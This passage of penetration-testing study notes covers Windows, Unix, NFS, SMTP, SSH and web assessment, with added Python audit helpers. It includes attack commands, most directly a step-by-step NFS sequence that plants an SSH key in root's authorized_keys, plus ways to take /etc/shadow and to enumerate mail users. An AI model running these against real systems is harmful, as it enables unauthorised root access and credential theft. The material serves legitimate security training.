Offline Password Analysis (rainbow tables / hash brute forcing)


See Crack Password Hashes (Offline Analysis)

E5) Windows Vulnerabilities
Read Chapter 15 about Windows Exploits in "Gray Hat Hacking, Third Edition.pdf".
Knowledge of common post exploitation activities:
https://github.com/mubix/post-exploitation
https://www.offensive-security.com/metasploit-unleashed/msf-post-exploitation/

Obtain Password Hashes


See also Metasploit section.

Obtain Locally-Stored clear-text passwords


Check the config files of ASP (Active Server Pages), PHP (Personal Home Page) etc. to get passwords of
databases etc.

Crack Password Hashes


See Crack Password Hashes (Offline Analysis)

Check Patch Levels


• systeminfo
• wmic qfe get hotfixid | find "KB99999" // check if hotfix KB99999 is installed
https://github.com/rapid7/metasploit-framework/wiki/How-to-check-Microsoft-patch-levels-for-your-exploit

Derive list of missing security patches


• https://gallery.technet.microsoft.com/scriptcenter/2d191bcd-3308-4edd-9de2-88dff796b0bc
• https://gallery.technet.microsoft.com/Get-WindowsUpdatesps1-7c82c1f4

E6) Windows Patch Management Strategies

Windows Update Agent (WUA)


The Windows Update Agent runs on client computers and must connect to one of the following:
• A Windows Update server running Windows Server Update Services (WSUS) on the corporate network.
• The Windows Update/Microsoft Update (WU/MU) service publicly available from Microsoft.

Systems Management Server (SMS)


System Center Configuration Manager (SCCM, also known as ConfigMgr),[1] formerly Systems Management
Server (SMS)[2] is a systems management software product developed by Microsoft for managing large groups
of computers running Windows NT, Windows Embedded, OS X, Linux or UNIX, as well as Windows Phone,
Symbian, iOS and Android mobile operating systems.[3] Configuration Manager provides remote control, patch
management, software distribution, operating system deployment, network access protection and hardware
and software inventory.

Server update services (SUS) / Windows Server Update Services (WSUS)


Windows Server Update Services (WSUS), previously known as Software Update Services (SUS), is a computer
program developed by Microsoft Corporation that enables administrators to manage the distribution of
updates and hotfixes released for Microsoft products to computers in a corporate environment. WSUS
downloads these updates from the Microsoft Update website and then distributes them to computers on a
network.

Microsoft Baseline Security Analyzer (MBSA)


Microsoft Baseline Security Analyzer (MBSA) is a software tool released by Microsoft to determine security
state by assessing missing security updates and less-secure security settings within Microsoft Windows,
Windows components such as Internet Explorer, IIS web server, and products Microsoft SQL Server, and
Microsoft Office macro settings.

E7) Desktop Lockdown

E8) Exchange

E9) Common Windows Applications


5) Unix Security Assessment

F1) User Enumeration

rusers
The rusers command produces output similar to who, but for the list of hosts or all machines on the local
network. For each host responding to the rusers query, the hostname and the users logged on are printed on
one line. The rusers command will wait for one minute to catch late responders.

The rusersd daemon is a server that responds to queries from the rusers command by returning a list of users
currently on the network. This daemon is normally started by the inetd daemon.
> rusers -a

Connects to rusersd RPC service and retrieves a list of logged-in users.


> nmap -sV --script=rusers <target>

rwho
The rwho command produces output similar to who, but for all machines on the local network. If no report has
been received from a machine for 11 minutes then rwho assumes the machine is down, and does not report
users last known to be logged into that machine.

> rwho -a

Rwhod is the server which maintains the database used by the rwho(1) and ruptime(1) programs.

SMTP (See also http://pentestmonkey.net/tools/user-enumeration/smtp-user-enum)

Username guessing tool primarily for use against the default Solaris SMTP service. Can use either EXPN, VRFY
or RCPT.
> smtp-user-enum.pl -M VRFY -U smtp_users.txt -t <IP>

Enumerating mail addresses.


> smtp-user-enum.pl -D example.com -M RCPT -U smtp_users.txt -t <IP>
Sample smtp_users.txt

Metasploit also offers a module. Only RHOSTS needs to be set.


> use auxiliary/scanner/smtp/smtp_enum

finger
Finger may be used to look up users on a remote machine. The format is to specify a user as “user@host”, or
“@host”
Attempts to retrieve a list of usernames using the finger service.
> nmap -sV -sC <IP>

F2) Unix Vulnerabilities

Password hashes in /etc/shadow on Unix systems

For understanding how this entire thing works, let's take the case of the previously shown example entry for
root user, from /etc/shadow file.

[root@slashroot1 ~]# cat /etc/shadow
root:$1$Etg2ExUZ$F9NTP7omafhKIlqaBMqng1:15651:0:99999:7:::

From the above shown example entry, our topic of interest is the second field (the field with the encoded hash
of the password).
$1$Etg2ExUZ$F9NTP7omafhKIlqaBMqng1

The above shown encoded hash value can be further classified into three different fields as below.

1. The first field is a number that tells you the hashing algorithm that is being used.
• $1 = MD5 hashing algorithm.
• $2 = Blowfish algorithm is in use.
• $2a = eksblowfish algorithm
• $5 = SHA-256 algorithm
• $6 = SHA-512 algorithm
2. The second field is the salt value.
The salt value is nothing but random data that is generated to combine with the original password, in order to
increase the strength of the hash.

3. The last field is the hash value of salt + user password (we will be discussing this shortly).

So in our example entry of root, as shown below,


$1$Etg2ExUZ$F9NTP7omafhKIlqaBMqng1

The above shown encoded password is using the MD5 hashing algorithm (because of the $1$),
the salt value is Etg2ExUZ (the content between the second and third $ sign),
and the rest is the hash value of "PASSWORD + SALT".
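The field split described above, as an added example that is not part of the revision notes: a Python parser for the second /etc/shadow field that extracts algorithm, salt and hash and reports the entries an assessor would write up (empty password fields and fast hash algorithms). The shadow lines are constructed, with the root entry repeating the example from the text; the $y$ (yescrypt) identifier and the bcrypt/DES-crypt layouts are facts about current crypt(3) formats added beyond the list above.

```python
"""Added example, not from the CREST notes: parse /etc/shadow password
fields into the algorithm, salt and hash parts described above and flag the
entries an assessor would report. The shadow lines are constructed; the root
entry repeats the example from the text."""

# Constructed sample; the non-root hashes are not real password hashes.
SAMPLE_SHADOW = """\
root:$1$Etg2ExUZ$F9NTP7omafhKIlqaBMqng1:15651:0:99999:7:::
alice:$6$Jq3kP9Zs$CONSTRUCTEDSHA512HASHVALUE:18000:0:99999:7:::
daemon:*:15651:0:99999:7:::
bob:!$6$Jq3kP9Zs$CONSTRUCTEDSHA512HASHVALUE:18000:0:99999:7:::
guest::18000:0:99999:7:::
legacy:abJnggxhB/yWI:15651:0:99999:7:::
"""

ALGORITHMS = {
    "1": "MD5", "2": "Blowfish", "2a": "eksblowfish", "2b": "eksblowfish", "2y": "eksblowfish",
    "5": "SHA-256", "6": "SHA-512", "y": "yescrypt",
}
WEAK_ALGORITHMS = {"MD5", "DES crypt"}   # fast hashes, cheap to brute force offline

def parse_password_field(field: str) -> dict:
    """Split the second shadow field into status, algorithm, salt and hash."""
    info = {"status": "ok", "algorithm": None, "salt": None, "hash": None}
    if field == "":
        info["status"] = "empty"          # no password required at all
        return info
    if field[0] in "!*":
        info["status"] = "locked"         # '!' locked account, '*' never had a password
        field = field.lstrip("!*")
        if not field:
            return info
    if field.startswith("$"):
        parts = field.split("$")          # ['', id, [rounds=N,] salt, hash]
        ident, rest = parts[1], parts[2:]
        info["algorithm"] = ALGORITHMS.get(ident, f"unknown (${ident}$)")
        if ident.startswith("2") and len(rest) == 2:
            # bcrypt packs the cost, then 22 salt chars and 31 hash chars together
            info["salt"], info["hash"] = rest[1][:22], rest[1][22:]
        else:
            if rest and rest[0].startswith("rounds="):
                rest = rest[1:]           # optional rounds parameter for SHA-2 crypt
            if len(rest) >= 2:
                info["salt"], info["hash"] = rest[0], rest[1]
    elif len(field) == 13:
        # traditional DES crypt: 2 salt characters followed by 11 hash characters
        info["algorithm"], info["salt"], info["hash"] = "DES crypt", field[:2], field[2:]
    else:
        info["algorithm"] = "unknown"
    return info

def audit_shadow(text: str) -> list[tuple[str, str]]:
    """(user, finding) for empty password fields and weak hash algorithms."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        user, pw_field = line.split(":")[:2]
        info = parse_password_field(pw_field)
        if info["status"] == "empty":
            findings.append((user, "empty password field: login without a password"))
        elif info["status"] == "ok" and info["algorithm"] in WEAK_ALGORITHMS:
            findings.append((user, f"weak hash algorithm ({info['algorithm']})"))
    return findings

if __name__ == "__main__":
    print(parse_password_field("$1$Etg2ExUZ$F9NTP7omafhKIlqaBMqng1"))
    for user, finding in audit_shadow(SAMPLE_SHADOW):
        print(f"{user}: {finding}")
```

Locked entries are parsed but not reported, since a leading `!` or `*` means the hash, weak or not, cannot be used to log in; the fix for the weak-algorithm findings is to have those users change their password after the system's default crypt method has been set to SHA-512 or yescrypt.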

Post Exploitation
Exfiltrate Password Hashes:
• Downloading files (/etc/passwd and /etc/shadow) through a meterpreter shell
• Get files (/etc/passwd and /etc/shadow) through path traversal
• Get hashes through SQL injection

Crack Password Hashes, see Crack Password Hashes (Offline Analysis)

Check Patch level


• Get kernel version (Generic)
o uname -a

• Get the Ubuntu version


o cat /etc/lsb-release
o cat /etc/issue
o dpkg -l | grep -i <package> // search installed version of specific package name, e.g. jboss

• Get the Red Hat version


o cat /etc/redhat-release
o rpm -qa | grep -i <package> // search installed version of specific package name, e.g. jboss

F3) FTP

FTP access control


FTP access can be limited to certain:
• IP addresses and/or IP ranges that are allowed to connect.
• Usernames that are allowed to connect.
• Times, by using logon time restrictions (e.g. login only possible from 9am to 6pm).
• Commands that can be executed once logged in.
• Read/write access to files/directories once logged in (Access Control Lists, ACL).
• Directories (jailed) once logged in.
• Quotas (limit the amount of disk space a user has once logged in).

Also enable a strong password policy and define a threshold for failed login attempts so brute forcing of
accounts is not possible.

Anonymous access to FTP servers
Anonymous access is often enabled by default in FTP servers and should be disabled on production systems if
not needed. Username should be "anonymous" and password the mail address (which can be any random
string also).

% ftp naic.nasa.gov
Connected to naic.nasa.gov.
220 naic.nasa.gov FTP server (Wed May 4 12:15:15 PDT 1994) ready.
Name (naic.nasa.gov:amarine): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-----------------------------------------------------------------
230-Welcome to the NASA Network Applications and Info Center Archive
230-

Risks of allowing write access to anonymous users.


CIA (Confidentiality, Integrity and Availability) cannot be ensured when enabling write access to anonymous
users.
• Files can be overwritten by unknown users.
• Files can be modified by unknown users.
• Files can be uploaded until the disk space is full, which can lead to a DoS of the server.
• Logging is almost useless as the anonymous username cannot be linked to an individual.

F4) Sendmail / SMTP

Valid username discovery via EXPN and VRFY


-> See "User Enumeration - Unix / SMTP"

Awareness of recent Sendmail vulnerabilities; ability to exploit them if possible


Check Metasploit... Postfix is nowadays more widely used than Sendmail.
https://www.cvedetails.com/vulnerability-list/vendor_id-31/Sendmail.html

Mail relaying
Check with Nmap:
nmap --script smtp-open-relay.nse -p 25,465,587 <host>
Arguments: [--script-args smtp-open-relay.domain=<domain>,smtp-open-relay.ip=<address>,...]

Metasploit:
msf > use auxiliary/scanner/smtp/smtp_relay
msf auxiliary(smtp_relay) > show actions
...actions...
msf auxiliary(smtp_relay) > set ACTION <action-name>
msf auxiliary(smtp_relay) > show options
...show and set options...
msf auxiliary(smtp_relay) > run
Manual open relay test:
nc <Host> <SMTP Port, e.g. 25>
HELO local.domain.name
MAIL FROM: [email protected]
RCPT TO: [email protected]
DATA
Subject: your subject line here
Hello world! I am the test email.
.
QUIT

F5) Network File System (NFS)

http://www.tldp.org/HOWTO/NFS-HOWTO/security.html

NFS security: host level (exports restricted to particular hosts) and file level (by UID and GID).
Configuration is done in /etc/exports (also /etc/hosts.deny and /etc/hosts.allow). This file lists the names or IP
addresses for machines that are allowed to access a share point. If the client's IP address matches one of the
entries in the access list then it will be allowed to mount.

IMPORTANT: Do not put anything but IP NUMBERS in the portmap lines of these files. Host name lookups can
indirectly cause portmap activity which will trigger host name lookups which can indirectly cause portmap
activity which will trigger...

The second step is file access. This is a function of normal file system access controls on the client and not a
specialized function of NFS. Once the drive is mounted the user and group permissions on the files determine
access control.

Root squashing, nosuid and noexec options.


root_squash: Prevents root users connected remotely from having root privileges and assigns them the user
ID for the user nfsnobody. This effectively "squashes" the power of the remote root user to the lowest local
user, preventing unauthorized alteration of files on the remote server. Alternatively, the no_root_squash
option turns off root squashing. To squash every remote user, including root, use the all_squash option.

On the client we can decide that we don't want to trust the server too much, in a couple of ways, with options
to mount. For example, we can forbid suid programs to work off the NFS file system with the nosuid option.
Some Unix programs, such as passwd, are called "suid" programs: they set the id of the person running them
to whoever is the owner of the file. If a file is owned by root and is suid, then the program will execute as
root, so that it can perform operations (such as writing to the password file) that only root is allowed to do.
Using the nosuid option is a good idea and you should consider using this with all NFS mounted disks. It means
that the server's root user cannot make a suid-root program on the file system, log in to the client as a normal
user and then use the suid-root program to become root on the client too. One could also forbid execution of
files on the mounted file system altogether with the noexec option. But this is more likely to be impractical
than nosuid since a file system is likely to at least contain some scripts or programs that need to be executed.
See also File System Permissions - Unix.
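The server-side (/etc/exports) and client-side (mount options) controls above, as an added example that is not part of the revision notes or of the NFS HOWTO: a Python audit that parses an exports file, flags exports open to every host and exports with no_root_squash, and lists which of the nosuid/noexec client options a mount is missing. The exports text is constructed; the handling of a bare `(options)` entry with no client in front of it follows exportfs's documented behaviour of applying such options to all hosts.

```python
"""Added example, not from the CREST notes or the NFS HOWTO: audit an
/etc/exports file for the settings discussed above (exports open to every
host, no_root_squash) and check client-side mount options for nosuid/noexec.
The exports text is constructed for this example."""
import re

SAMPLE_EXPORTS = """\
# constructed sample /etc/exports, not from a real server
/srv/public     *(ro,sync)
/home           192.168.1.0/24(rw,sync,root_squash)
/               *(rw,no_root_squash)
/data           (rw)
/backup         backup01.example.com(rw,sync,all_squash)
"""

_CLIENT_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")

def parse_exports(text):
    """Return (path, client, [options]) per client entry. A bare '(opts)' with
    no client in front of it is the classic typo: the options then apply to
    every host, and a path with no client list at all is exported to all."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        tokens = line.split()
        path, clients = tokens[0], tokens[1:] or ["*"]
        for token in clients:
            m = _CLIENT_RE.match(token)
            client, opts = m.group(1), m.group(2)
            entries.append((path, client, opts.split(",") if opts else []))
    return entries

def audit_exports(text):
    """Findings an assessor would report from the exports file."""
    findings = []
    for path, client, opts in parse_exports(text):
        if client in ("", "*"):
            findings.append(f"{path}: exported to every host ({client or 'options without a client'})")
        if "no_root_squash" in opts:
            findings.append(f"{path}: no_root_squash for {client or '*'}: remote root keeps uid 0 on the server")
        if "insecure" in opts:
            findings.append(f"{path}: insecure accepts requests from unprivileged source ports for {client or '*'}")
    return findings

CLIENT_HARDENING = ("nosuid", "noexec")

def missing_client_hardening(mount_options):
    """Client mount options from the text above that a mount does not set.
    nosuid is the one to insist on; noexec is often impractical."""
    return [o for o in CLIENT_HARDENING if o not in mount_options]

if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS):
        print(finding)
    print("missing on client:", missing_client_hardening(["rw", "hard", "nosuid"]))
```

On a live system the input is the server's /etc/exports (or `showmount -e` output for a remote view of the paths) and, for the client side, the options column of `mount` for each nfs entry.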

File access through UID and GID manipulation.


Abusing Hardlinks via NFS

Getting root with NFS


# Check whether NFS is running
rpcinfo -p X.X.X.X
#See what can be mounted
showmount -e X.X.X.X
Export list for X.X.X.X
/*
# Jackpot
# Mount the root file system
mkdir /tmp/r00t
mount -t nfs X.X.X.X:/ /tmp/r00t/
cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys
umount /tmp/r00t
# connect as root
ssh [email protected]

F6) R* services

Access control (/etc/hosts.equiv and .rhosts)

http://manpages.ubuntu.com/manpages/trusty/man5/hosts.equiv.5.html

The hosts.equiv file allows or denies hosts and users to use the r-
commands (e.g., rlogin, rsh or rcp) without supplying a password.

The file uses the following format:

[ + | - ] [hostname] [username]

The .rhosts file is in the user home directory under Unix and contains a list of username and IP address or
machine hostname pairs, such as the following:

# pwd
/home/chris
# cat .rhosts
chris mail.trustmatta.com
+ 192.168.0.55

In this example, I can use any of the r-services (rsh, rlogin, or rexec) to connect to this host from
mail.trustmatta.com if I am logged into the host as chris or from 192.168.0.55 with any username on that host.

When a user connects to the host running rshd (the remote shell daemon running on TCP port 514), the source
IP address is cross-referenced against the .rhosts file, and the username is verified by querying the identd
service running at the source. If these details are valid, direct access is given to the host without even requiring
a password.

Rlogin:

rlogin -l root X.X.X.X


Trust relationships

F7) X11

Arguments Against a GUI


(https://help.ubuntu.com/community/ServerGUI#Arguments_Against_a_GUI)

Most Ubuntu Server developers recommend not installing a GUI on a server. There are multiple reasons for
not installing a GUI.

Some reasons to not install a GUI include:


• You'll have more code subject to security vulnerabilities, more packages that need updating, and
more server downtime.
• Performance may suffer because resources (memory, hard disk space, CPU, etc.) will be consumed by
the GUI.
• It is best practice to only install needed software on a production server.
• The GUI may include other network services that are inappropriate for a server.
o One of the goals of Ubuntu Desktop Edition is to make it easier for users to use Linux. When
installing some desktop environments, services that you may not specifically want will be
installed. For example avahi-daemon, which is used to help configure networking, adds
another open port and may introduce unwanted DNS conflicts with a .local domain.
• If you're using an Ubuntu LTS release prior to 12.04 LTS, X11 and desktop packages are not supported
for the full 5-year lifecycle of the LTS server release. So, for the most secure server it is best to not
install a GUI.

Copied from Wikipedia:


Host-based access[edit]
The host-based access method consists in specifying a set of hosts that are authorized to connect to the X
display server. This system has inferior security, as it allows every user who has access to such a host to
connect to the display. The xhost program and three X Window System core protocol requests are used to
activate this mechanism and to display and change the list of authorized hosts. Improper use of xhost can in
advertently give every host on the Internet full access to an X display server.

Cookie-based access[edit]
The cookie-based authorization methods are based on choosing a magic cookie (an arbitrary piece of data) and
passing it to the X display server when it is started; every client that can prove having knowledge of this cookie
is then authorized connection to the server.
These cookies are created by a separate program and stored in the file .Xauthority in the user's home
directory, by default. As a result, every program run by the client on the local computer can access this file and
therefore the cookie that is necessary for being authorized by the server. If the user wants to run a program
from another computer on the network, the cookie has to be copied to that other computer. How the cookie is
copied is a system-dependent issue: for example, on Unix-like platforms, scp can be used to copy the cookie.

The two systems using this method are MIT-MAGIC-COOKIE-1 and XDM-AUTHORIZATION-1. In the first
method, the client simply sends the cookie when requested to authenticate. In the second method, a secret
key is also stored in the .Xauthority file. The client creates a string by concatenating the current time, a
transport-dependent identifier, and the cookie, encrypts the resulting string, and sends it to the server.

The xauth application is a utility for accessing the .Xauthority file.

User-based access
The user-based access methods work by authorizing specific users to connect to the server. When a client
establishes a connection to a server, it has to prove being controlled by an authorized user.

The two methods based on authenticating users using networked identity management systems are SUN-DES-1
and MIT-KERBEROS-5. The first system is based on a secure mechanism of the ONC remote procedure
call system developed in SunOS. The second mechanism is based on both client and server trusting
a Kerberos server.

A third method is limited to local connections, using system calls to ask the kernel what user is on the other
end of a local socket. The xhost program can be used to add or remove localuser and localgroup entries with
this method.[1]
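As an added audit helper (not part of the original notes or of the Wikipedia text), the following Python parses a .Xauthority file using the length-prefixed layout that libXau writes and reports each entry's address family and authorization method, flagging wildcard-host entries and short MIT-MAGIC-COOKIE-1 cookies; the sample file is constructed inside the block.

```python
"""Parse an .Xauthority file and report the access method of each entry.

Added audit helper; not part of the original notes. The layout follows what
libXau's XauReadAuth reads: a big-endian 16-bit family code, then four fields
(address, display number, auth name, auth data), each a big-endian 16-bit
length followed by that many bytes.
"""
from __future__ import annotations

import struct
from typing import Iterator, NamedTuple

# Family codes from X11/Xauth.h; FamilyWild (65535) matches any host.
FAMILIES = {0: "Internet", 6: "Internet6", 256: "Local", 65535: "Wild"}


class XauthEntry(NamedTuple):
    family: str
    address: bytes
    display: str
    name: str     # e.g. MIT-MAGIC-COOKIE-1 or XDM-AUTHORIZATION-1
    data: bytes   # the cookie (MIT-MAGIC-COOKIE-1 normally uses 16 random bytes)


def _read_field(buf: bytes, pos: int) -> tuple[bytes, int]:
    """Read one length-prefixed field; return (value, position after it)."""
    if pos + 2 > len(buf):
        raise ValueError("truncated .Xauthority entry")
    (length,) = struct.unpack_from(">H", buf, pos)
    pos += 2
    if pos + length > len(buf):
        raise ValueError("field runs past end of file")
    return buf[pos:pos + length], pos + length


def parse_xauthority(buf: bytes) -> Iterator[XauthEntry]:
    """Yield every entry in the file, raising ValueError on a truncated file."""
    pos = 0
    while pos < len(buf):
        if pos + 2 > len(buf):
            raise ValueError("truncated family code")
        (family,) = struct.unpack_from(">H", buf, pos)
        pos += 2
        address, pos = _read_field(buf, pos)
        display, pos = _read_field(buf, pos)
        name, pos = _read_field(buf, pos)
        data, pos = _read_field(buf, pos)
        yield XauthEntry(FAMILIES.get(family, f"family-{family}"), address,
                         display.decode(), name.decode(), data)


def audit(buf: bytes) -> list[str]:
    """One line per entry; weak properties are named, otherwise 'ok'."""
    findings = []
    for e in parse_xauthority(buf):
        notes = []
        if e.name == "MIT-MAGIC-COOKIE-1" and len(e.data) < 16:
            notes.append("short cookie")          # little entropy to guess
        if e.family == "Wild":
            notes.append("wildcard host entry")   # accepted from any address
        findings.append(f"{e.family} :{e.display} {e.name} {', '.join(notes) or 'ok'}")
    return findings


def build_entry(family: int, address: bytes, display: str, name: str, data: bytes) -> bytes:
    """Serialise one entry (used here only to construct the sample file)."""
    out = struct.pack(">H", family)
    for field in (address, display.encode(), name.encode(), data):
        out += struct.pack(">H", len(field)) + field
    return out


# Constructed sample: a sound local cookie and a weak wildcard one.
SAMPLE = (build_entry(256, b"workstation", "0", "MIT-MAGIC-COOKIE-1", bytes(range(16)))
          + build_entry(65535, b"", "1", "MIT-MAGIC-COOKIE-1", b"\x01\x02\x03\x04"))

if __name__ == "__main__":
    for line in audit(SAMPLE):
        print(line)
```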

F8) RPC services

The RPC program identification probes are done in parallel, and retransmissions are handled for UDP ports. This
feature is automatically activated whenever version detection finds any RPC ports. Example 7.6 demonstrates
direct RPC scanning done as part of version detection.

# nmap -F -A -sSU ultra

# nmap -sR <target>
# nmap --script rpc-grind <target>
Also possible by using rpcinfo:
# rpcinfo -p <target>

Common RPC vulnerabilities:
Check Metasploit and exploit-db.
F9) SSH
Identify the types and versions of SSH software in use
nmap scan
ssh -v <target>

Securing SSH
See http://www.cyberciti.biz/tips/linux-unix-bsd-openssh-server-best-practices.html
• Only Use SSH Protocol 2
• Limit Users’ SSH Access (AllowUsers directive)
• Configure Idle Log Out Timeout Interval
• Disable .rhosts Files
• Disable Host-Based Authentication
• Disable root Login via SSH
• Enable a Warning Banner
• Use Public Key Based Authentication
• Chroot SSHD (Lock Down Users To Their Home Directories)
• Disable Empty Passwords
• Thwart SSH Crackers (Brute Force Attack) by using tools like fail2ban
• Use Log Analyzer
• Patch OpenSSH and Operating Systems
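An added example (not from the notes or the linked article) that parses an sshd_config in OpenSSH's own keyword syntax and reports which items of the list above it does not meet; the directive names are the real OpenSSH ones, the sample configuration is constructed, and items with no single directive (fail2ban, log analysis, patching) are out of scope.

```python
"""Check an sshd_config against the hardening list above.

Added example for these notes, not a tool from the linked article. Parses the
real OpenSSH keyword syntax (case-insensitive keyword, first value wins, '#'
comments, whitespace or '=' separator) and reports which list items are not met.
"""
from __future__ import annotations

# Expected values; None means the directive only has to be present. An absent
# directive is reported because the OpenSSH default may not be the hardened one.
EXPECTED = {
    "protocol": ("2", "Only use SSH protocol 2"),   # recent OpenSSH dropped SSH1 and ignores this
    "allowusers": (None, "Limit users' SSH access (AllowUsers)"),
    "clientaliveinterval": (None, "Configure idle log-out timeout"),
    "ignorerhosts": ("yes", "Disable .rhosts files"),
    "hostbasedauthentication": ("no", "Disable host-based authentication"),
    "permitrootlogin": ("no", "Disable root login via SSH"),
    "banner": (None, "Enable a warning banner"),
    "pubkeyauthentication": ("yes", "Use public-key authentication"),
    "permitemptypasswords": ("no", "Disable empty passwords"),
}


def parse_sshd_config(text: str) -> dict[str, str]:
    """Return {lowercase keyword: value}; OpenSSH uses the first occurrence."""
    settings: dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        # Keyword and value are separated by whitespace or a single '='.
        parts = line.replace("=", " ", 1).split(None, 1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        settings.setdefault(key, value)
    return settings


def hardening_findings(text: str) -> list[str]:
    """List the hardening items the configuration does not satisfy."""
    settings = parse_sshd_config(text)
    findings = []
    for key, (want, label) in EXPECTED.items():
        have = settings.get(key)
        if have is None:
            findings.append(f"{label}: not set")
        elif want is not None and have.lower() != want:
            findings.append(f"{label}: is '{have}', expected '{want}'")
    return findings


# Constructed sample: a plausible sshd_config with two items from the list unmet.
WEAK_CONFIG = """\
# sample sshd_config (constructed for this example)
Protocol 2
PermitRootLogin yes
PasswordAuthentication yes
PermitEmptyPasswords no
HostbasedAuthentication no
IgnoreRhosts yes
PubkeyAuthentication yes
ClientAliveInterval 300
Banner /etc/issue.net
"""

if __name__ == "__main__":
    for finding in hardening_findings(WEAK_CONFIG):
        print(finding)
```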

SSH 1 and SSH 2

In fact, SSH1 and SSH2 are two entirely different protocols with no compatibility between them. SSH2 is a
significantly improved version of SSH1 in many respects. First of all, while SSH1 is a monolithic design where
several different functions (e.g., authentication, transport, connection) are packed into a single protocol, SSH2
is a layered architecture designed with extensibility and flexibility in mind. In terms of security, SSH2 comes
with a number of stronger security features than SSH1, such as MAC-based integrity check, flexible session re-
keying, fully-negotiable cryptographic algorithms, public-key certificates, etc.

SSH2 is standardized by IETF, and as such its implementation is widely deployed and accepted in the industry.
Due to SSH2's popularity and cryptographic superiority over SSH1, many products are dropping support for
SSH1. As of this writing, OpenSSH still supports both SSH1 and SSH2, while on all modern Linux distributions,
OpenSSH server comes with SSH1 disabled by default.

Authentication mechanisms within SSH

Username/password combination to log in.

Login by using a key pair (the public key is on the server in <home>/.ssh/authorized_hosts; the private key is needed to log in).


6) Web Technologies

G1) Web Server Operation

3 layers of architecture
• Web Server
• Application Server
• Database Server

G2) Web Servers & their Flaws


Fundamental differences:
1. Apache is free while IIS is packaged with Windows Server.
2. IIS only runs on Windows while Apache can run on almost any OS including UNIX, Windows, Apple’s OS X,
and on most Linux Distributions.
3. ASPX runs only in IIS.

IIS (Internet Information Services)


Wikipedia:
By default IIS 5.1 and earlier run websites in a single process running the context of the System account,[51] a
Windows account with administrative rights. Under 6.0 all request handling processes run in the context of the
Network Service account, which has significantly fewer privileges, so that should there be a vulnerability in a
feature or in custom code it won't necessarily compromise the entire system given the sandboxed environment
these worker processes run in.[52] IIS 6.0 also contained a new kernel HTTP stack (http.sys) with a stricter
HTTP request parser and response cache for both static and dynamic content.[53]

https://www.cvedetails.com/vulnerability-list/vendor_id-26/product_id-3436/Microsoft-IIS.html
http://blog.trendmicro.com/trendlabs-security-intelligence/iis-at-risk-the-http-protocol-stack-vulnerability/

Apache
There are still two major branches:
• Apache 2.2
• Apache 2.4

Features in 2.4, compared to 2.2: https://httpd.apache.org/docs/2.4/new_features_2_4.html

G3) Web Enterprise Architectures


In software engineering, multitier architecture (often referred to as n-tier architecture) is a client–server
architecture in which presentation, application processing, and data management functions are physically
separated. The most widespread use of multitier architecture is the three-tier architecture.

Three-tier architecture:
• Presentation tier: This is the topmost level of the application. The presentation tier displays
information related to such services as browsing merchandise, purchasing and shopping cart
contents. It communicates with other tiers by which it puts out the results to the browser/client tier
and all other tiers in the network. In simple terms, it is a layer which users can access directly (such as
a web page, or an operating system's GUI).

• Application tier (business logic, logic tier, or middle tier): The logical tier is pulled out from the
presentation tier and, as its own layer, it controls an application’s functionality by performing detailed
processing.

• Data tier: The data tier includes the data persistence mechanisms (database servers, file shares, etc.)
and the data access layer that encapsulates the persistence mechanisms and exposes the data. The
data access layer should provide an API to the application tier that exposes methods of managing the
stored data without exposing or creating dependencies on the data storage mechanisms. Avoiding
dependencies on the storage mechanisms allows for updates or changes without the application tier
clients being affected by or even aware of the change. As with the separation of any tier, there are
costs for implementation and often costs to performance in exchange for improved scalability and
maintainability.

Logical layers are merely a way of organizing your code. Typical layers include Presentation, Business and Data
– the same as the traditional 3-tier model. But when we’re talking about layers, we’re only talking about logical
organization of code. In no way is it implied that these layers might run on different computers or in different
processes on a single computer or even in a single process on a single computer. All we are doing is discussing
a way of organizing a code into a set of layers defined by specific function.

Physical tiers however, are only about where the code runs. Specifically, tiers are places where layers are
deployed and where layers run. In other words, tiers are the physical deployment of layers.

MVC
Model–view–controller (MVC) is a software architectural pattern for implementing user interfaces on
computers. It divides a given software application into three interconnected parts, so as to separate internal
representations of information from the ways that information is presented to or accepted from the
user.[1][2]
Traditionally used for desktop graphical user interfaces (GUIs), this architecture has become popular for
designing web applications.

G4) Web Protocols

HTTP
Unencrypted

HTTPS
Encrypted

SOAP
SOAP (Simple Object Access Protocol) is a protocol specification for exchanging structured information in the
implementation of web services in computer networks. SOAP allows processes running on disparate operating
systems (such as Windows and Linux) to communicate using Extensible Markup Language (XML).

SOAP provides the Messaging Protocol layer of a web services protocol stack for web services. It is an XML-based
protocol consisting of three parts:
• an envelope, which defines the message structure and how to process it
• a set of encoding rules for expressing instances of application-defined datatypes
• a convention for representing procedure calls and responses

Example:
POST /InStock HTTP/1.1
Host: www.example.org
Content-Type: application/soap+xml; charset=utf-8
Content-Length: 299
SOAPAction: "http://www.w3.org/2003/05/soap-envelope"

<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
  <soap:Header>
  </soap:Header>
  <soap:Body>
    <m:GetStockPrice xmlns:m="http://www.example.org/stock/Surya">
      <m:StockName>IBM</m:StockName>
    </m:GetStockPrice>
  </soap:Body>
</soap:Envelope>

HTTP Web Methods


GET
The GET method requests a representation of the specified resource. Requests using GET should only retrieve
data and should have no other effect. (This is also true of some other HTTP methods.)[1] The W3C has
published guidance principles on this distinction, saying, "Web application design should be informed by the
above principles, but also by the relevant limitations."[13] See safe methods below.

HEAD
The HEAD method asks for a response identical to that of a GET request, but without the response body. This is
useful for retrieving meta-information written in response headers, without having to transport the entire
content.

POST
The POST method requests that the server accept the entity enclosed in the request as a new subordinate of
the web resource identified by the URI. The data POSTed might be, for example, an annotation for existing
resources; a message for a bulletin board, newsgroup, mailing list, or comment thread; a block of data that is
the result of submitting a web form to a data-handling process; or an item to add to a database.[14]

PUT
The PUT method requests that the enclosed entity be stored under the supplied URI. If the URI refers to an
already existing resource, it is modified; if the URI does not point to an existing resource, then the server can
create the resource with that URI.[15]

DELETE
The DELETE method deletes the specified resource.

TRACE
The TRACE method echoes the received request so that a client can see what (if any) changes or additions
have been made by intermediate servers.

OPTIONS
